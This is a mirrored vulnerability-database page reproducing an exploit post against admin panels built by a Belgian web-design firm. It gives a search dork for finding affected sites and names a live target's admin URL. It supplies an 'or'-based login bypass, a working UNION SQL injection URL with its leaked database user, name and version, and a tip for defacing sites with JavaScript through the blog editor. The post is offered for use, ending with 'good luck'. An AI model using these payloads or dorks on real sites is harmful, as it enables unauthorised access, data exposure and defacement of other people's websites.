Belgium Panel Admin Bypass JSDeface & SQLi - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1209550 漏洞类型
发布时间 2018-06-11 更新时间 2018-06-11
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2018060095
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
@ Title: Belgium Panel Admin Bypass JSDeface & SQLi

@ Date: 09.06.2018

@ Vendor: http://www.digital-productions.be/

@ Author: Informacion - Anonymous

@ Dork: intext:"Design & development by Digital Productions"

@ P0c: http://www.dataskills.be/admin

# '=' 'or' user & pass :)

# SQLI: /admin/blog-aanpassen.php?id=4' [SQLi]

# site.com/admin/blog-aanpassen.php?id=.4' +UNION+ALL+SELECT+1,2,3,4,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),6,7,8,9,10,11,12-- -data@localhost : dataskills_admin : 10.0.32-MariaDB-0+deb8u1

@ Tutorial: Deface JS in the eyelash "Blog" add new and deface JS, good luck :).
################################################################################################